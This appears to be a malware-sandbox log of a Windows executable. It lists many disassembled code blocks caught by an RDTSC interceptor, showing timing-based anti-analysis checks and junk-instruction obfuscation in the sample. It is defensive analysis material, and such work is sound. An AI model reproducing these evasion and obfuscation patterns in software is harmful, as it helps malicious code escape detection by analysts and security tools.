Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF068 second address: 4CF0E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F595561499Ch 0x0000000c jnp 00007F5955614996h 0x00000012 popad 0x00000013 xor dword ptr [esp], 0D53EE8Bh 0x0000001a push edx 0x0000001b jl 00007F5955614998h 0x00000021 push edi 0x00000022 pop ecx 0x00000023 pop edx 0x00000024 adc dl, FFFFFFA1h 0x00000027 push 00000003h 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c mov edi, dword ptr [ebp+122D3A11h] 0x00000032 add ch, 0000000Eh 0x00000035 popad 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F5955614998h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jno 00007F595561499Ch 0x00000058 call 00007F5955614999h 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F595561499Dh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E1 second address: 4CF0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E5 second address: 4CF119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5955614998h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F59556149A6h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F5955614998h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF119 second address: 4CF123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5954CE94A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF123 second address: 4CF13F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F595561499Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF332 second address: 4CF33C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5954CE94ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF3D4 second address: 4CF3D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF4B6 second address: 4CF4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF4BA second address: 4CF4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF4C0 second address: 4CF501 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5954CE94ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 69A4DBB0h 0x00000011 jnc 00007F5954CE94ACh 0x00000017 lea ebx, dword ptr [ebp+12455F0Dh] 0x0000001d jmp 00007F5954CE94B2h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF501 second address: 4CF505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1730 second address: 4E1734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDA82 second address: 4EDAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5955614996h 0x0000000a jmp 00007F59556149A1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDAA1 second address: 4EDAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5954CE94A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDAAB second address: 4EDABB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDABB second address: 4EDAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDAC1 second address: 4EDAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDAC5 second address: 4EDACB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDACB second address: 4EDAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDEB0 second address: 4EDEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDEB4 second address: 4EDF05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A8h 0x00000007 jc 00007F5955614996h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007F59556149A8h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F595561499Dh 0x0000001d jnl 00007F5955614996h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDF05 second address: 4EDF09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDF09 second address: 4EDF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE1FF second address: 4EE205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE205 second address: 4EE222 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5955614996h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F595561499Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE7A9 second address: 4EE7AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE7AF second address: 4EE7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE7B5 second address: 4EE7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE7B9 second address: 4EE7BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2CF4 second address: 4E2CFE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EEBFD second address: 4EEC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EEC01 second address: 4EEC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5954CE94AEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EEC1B second address: 4EEC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EEC1F second address: 4EEC29 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF838 second address: 4EF842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5955614996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF842 second address: 4EF855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF855 second address: 4EF85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F49A7 second address: 4F49AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F49AD second address: 4F49E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F59556149A3h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d js 00007F59556149B1h 0x00000013 pushad 0x00000014 jmp 00007F59556149A3h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3140 second address: 4F3144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4B07 second address: 4F4B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7A9E second address: 4F7AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD578 second address: 4FD582 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCA0B second address: 4FCA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCA0F second address: 4FCA13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCB5F second address: 4FCB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCB68 second address: 4FCB6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD124 second address: 4FD12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD275 second address: 4FD281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007F5955614996h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD3E9 second address: 4FD3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD3ED second address: 4FD401 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5955614996h 0x00000008 jc 00007F5955614996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD401 second address: 4FD405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD405 second address: 4FD41C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a jmp 00007F595561499Ah 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF25B second address: 4FF264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF300 second address: 4FF337 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 jg 00007F595561499Ch 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F59556149A6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFE13 second address: 4FFE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFE17 second address: 4FFE25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F595561499Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFEE1 second address: 4FFEE7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFFA1 second address: 4FFFB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500193 second address: 500197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5004B0 second address: 5004B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500A6A second address: 500AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F5954CE94A8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov esi, 67CD75C5h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F5954CE94A8h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D2144h], ebx 0x0000004e push 00000000h 0x00000050 mov di, 2B5Ch 0x00000054 and si, F531h 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b jbe 00007F5954CE94A8h 0x00000061 pushad 0x00000062 popad 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F5954CE94B3h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500AFD second address: 500B26 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F59556149ABh 0x00000014 jmp 00007F59556149A5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501624 second address: 50162B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5047F7 second address: 504819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F595561499Bh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F595561499Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5052EF second address: 505306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnp 00007F5954CE94A6h 0x00000010 jc 00007F5954CE94A6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505EC6 second address: 505ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505ECC second address: 505EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5954CE94B0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505EE3 second address: 505EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506967 second address: 506981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E8F second address: 509E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E93 second address: 509EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5954CE94AFh 0x00000012 pop edx 0x00000013 nop 0x00000014 mov ebx, dword ptr [ebp+122D26E3h] 0x0000001a push 00000000h 0x0000001c sub di, E1D9h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007F5954CE94A8h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d movzx ebx, bx 0x00000040 xchg eax, esi 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509EED second address: 509EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E40B second address: 50E411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51257A second address: 512581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512581 second address: 5125C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a sbb ebx, 1D9AECEFh 0x00000010 push 00000000h 0x00000012 mov ebx, 1A069B15h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F5954CE94A8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5146C8 second address: 5146DA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5146DA second address: 5146DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506733 second address: 50675A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5955614998h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5146DE second address: 5146E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5158D8 second address: 515905 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F595561499Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b ja 00007F595561499Ch 0x00000011 pushad 0x00000012 jmp 00007F595561499Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515905 second address: 515950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 mov bl, 6Bh 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F5954CE94A8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 sub edi, 0B74487Dh 0x0000002d xchg eax, esi 0x0000002e push ecx 0x0000002f push eax 0x00000030 jp 00007F5954CE94A6h 0x00000036 pop eax 0x00000037 pop ecx 0x00000038 push eax 0x00000039 push esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jg 00007F5954CE94A6h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51695C second address: 516961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516961 second address: 516978 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5954CE94A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F5954CE94B0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B11C8 second address: 4B11D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B11D1 second address: 4B11DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B11DA second address: 4B11DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B11DE second address: 4B11E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5954CE94A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5223CB second address: 5223E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5223E7 second address: 5223EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5223EB second address: 5223F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5223F7 second address: 5223FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
